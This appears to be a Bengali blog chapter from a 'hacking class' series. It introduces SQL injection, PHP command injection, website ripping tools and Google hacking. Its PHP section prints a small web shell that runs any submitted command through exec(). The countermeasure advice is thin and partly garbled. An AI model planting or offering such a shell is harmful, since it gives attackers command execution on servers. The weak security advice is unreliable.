.....
- Back to Home »
- হ্যাকিং ক্লাস »
- অধ্যায়: ২০ বেসিক ওয়েবসাইট হ্যাকিং (তথ্য)-২
1. SQL Injection
2. PHP Remote Code Execution
3. Web Ripping
4. Google Hacking
SQL Injection :
SQL Injection হচ্ছে একধরনের আক্রমন প্রক্রিয়া যাতে ফায়ারওয়াল দিয়ে রক্ষিত ডাটাবেসের ডাটা সমূহে টার্গেট করা হয়। এটা ওয়েব নির্ভর যেকোন এ্যাপ্লিকেশনের প্যারামিটার পরিবর্তনের চেষ্টা করে যা এসকিউএল নির্ভর কোন সার্ভারথেকে ডাটা সংরক্ষন করতে ব্যবহৃত হয়।
সাধারনত, প্রথম পদক্ষেপে এটা কোন আক্রমন উপযোগী ওয়েব এ্যাপ্লিকেশন অরক্ষিত করে। এই এ্যাটাকটি ঐ ওয়েব এ্যাপ্লিকেশনটির দুর্বল কোডিং এবং ওয়েবসাইট এডমিনের সুযোগ গ্রহন করে।
একটি SQL Injection এর মাধ্যমে কোন আক্রমন উপযোগী ওয়েব সার্ভারকে আক্রমনের মাধ্যমে এর কর্তৃত্ব নেয় যাতে করে ঐ সার্ভার ডাটাবেসের যেকোন তথ্য পড়া, পরিবর্তন করা বা মুছে দেয়া যায়।
ধারনা :
SQL Injection এ ইউজার SQL কোয়েরীতে স্থাপিত যেকোন ডাটার কন্ট্রোল নিতে পারে কোনরকম ডাটার শুদ্ধতা পরীক্ষা করা ছাড়াই। এর দ্বারাই ইন্টারনেটে প্রতিদিন হাজার হাজার ওয়েব এ্যাপ্লিকেশন ক্ষতিগ্রস্থ হচ্ছে। বর্তমানে ইন্টারনেটে প্রায় ৫০% বড় ই-কমার্স সাইট এবং ৭৫% ছোট ই-কমার্স সাইট এই আক্রমন উপযোগী। কোন ওয়েবসাইটে যদি CFML, ASP, JSP এবং PHP এর অসম ব্যবহার থাকে তাহলে ঐ সকর সাইট এই আক্রমনের উপযোগী।
SQL Injection এ ভ্যালিডেশন প্রবেশ করানো :
SQL Injection আক্রমন প্রশমিত করার জন্য কিছু টুলস বা পরিকল্পনা রয়েছে।
ওয়েব ডেভেলোপাররা লগইন পেজে কিছু সন্ধিগ্ধ কারেক্টার প্রবেশ করায়। যেমন: ‘, “, , , — ,
ডাটাবেসে সবসময় পাসওয়ার্ডগুলো এনক্রিপ্ট করে রাখা
এই পদ্ধতিগুলোর সঠিক ব্যবহারেও এসকিউএল প্রতিরোধ করা যায় না, কিন্তু এগুলো হ্যাকারের হ্যাকিং কার্য কঠিন করে দেয়।
PHP Injection :
এই আক্রমন কোন টার্গেট ওয়েব সার্ভারের সিস্টেম লেভেল ভেঙ্গে ফেলতে ব্যবহৃত হয়। এই আক্রমনের দরুন, হ্যাকার ওয়েবসার্ভারটিতে প্রবেশ করতে পারে এবং এর সমস্ত ফাইলের কর্তত্ব নিয়ে নিতে পারে।
Script :
1.<form action=" " method=post>
2.<input type=text name=command>
3.<input type=hidden name=filled value=1>
4.<input type=submit value="Run Command">
5.</form>
6.<?php
7.if($_post[filled]==1)
8.{
9.$output=exec("$_post[command]")
10.print $output;
11.}
12.?>
Counter Measure :
১। এটা আপনার সার্ভারে তথ্য সাপ্লাইয়ের পূর্বেই ইউজারের দেয়া তথ্যাদির সত্যাদি পরীক্ষা করে দেথে, এটা সাধারনত জাভাস্ক্রিপ্ট বা অন্য কোন ফিল্টারিং মাধ্যমে ব্যবহৃত হয়।
Web Ripping :
ওয়েব রেপিং কোন নির্দিষ্ট ওয়েবসাইটের ঠিকানা থেকে ছবি বা ইমেজ বা অন্যান্য মিডিয়া ফাইল খুজে বের করে তা এক্সট্রাক্ট করে এবং আপনার হার্ড ড্রাইভে তা সংরক্ষন করে রাখে। ওয়েব রেপিং কোন ওয়েবসাইটটির সম্পূর্ণ গঠন আপনার হার্ড ড্রাইভে সংরক্ষনের ক্ষমতা রাখে।
সাবধানতা : আপনি ওয়েবসাইটটির এডমিন কর্তৃক ধরা পড়ে যেতে পারেন কারন আপনিতো সেখানে একটি সাধারন ইউজার হিসেবে প্রবেশ করেছেন যাতে করে কর্তৃপক্ষ আপনার আইপি বাতিল করে দিতে পারে বা ঐ সার্ভারটি থেকে আপনার সংযোগ প্রকৃয়া কেটে দিতে পারে।
ওয়েব রেপিংয়ে ব্যবহৃত কিছু টুলস :
1). Black Widow.
2). Wget
3). Web Sleuth.
Google Hacking :
ইন্টারনেটের প্রায় ৮০ ভাগ সার্চ কোয়েরী আসে গুগলের সার্ভার থেকে। এটা বর্তমানে সর্বাপেক্ষা শক্তিশালী এবং জনপ্রিয় সার্চ ইঞ্জিনে পরিনত হয়েছে। এটার জনপ্রিয়তা এর সার্চ ক্ষমতা থেকেই আসে নি, বরং এটার কোয়েরী বা ইনডেক্সিং করার ক্ষমতা থেকেই এসেছে। যাহোক, আমাদের মনে রাখা উচিত যে, ইন্টারনেট হচেছ একটি উচ্চ ক্ষমতা সম্পন্ন মাধ্যম, যার কারনে গুগল যে রেজাল্টগুলো দেয় তা সবসময় আপ-টু-ডেট হয়না বা কিছু তথ্য হয়ত চুরি হয়ে যায়।এছাড়াও কিছু নিষিদ্ধ উপাদান গুগলবট (এটা গুগলের স্বয়ংক্রিয় স্ক্রিপ্ট যা ইন্টারনেটের সকল তথ্যাদি গুগল সার্ভারে জমা করে রাখে) দ্বারা ভিজিটও হয়না। আমরা জানি যে, গুগল একটা সার্চ ইঞ্জিন।
গুগলের কিছু নির্দিষ্ট ষ্ট্রিং বা কমান্ড দিয়ে সার্চের মাধ্যমে গুগল কর্তৃক হ্যাকিং কার্য সম্পন্ন করা হয়। যেটাকে গুগল এ্যাডভান্সড অপারেটর বলা হয়। এর মাধ্যমেই দৈনিক লাখো লাখো ওয়েবসাইট বের করা হয় যেগুলো হ্যাকিং আক্রমন উপযোগী।
প্রিয় বন্ধুরা, এই বাংলা ব্লগ-এ আপনারা পড়ছেন অধ্যায়: ২০ বেসিক ওয়েবসাইট হ্যাকিং (তথ্য)-২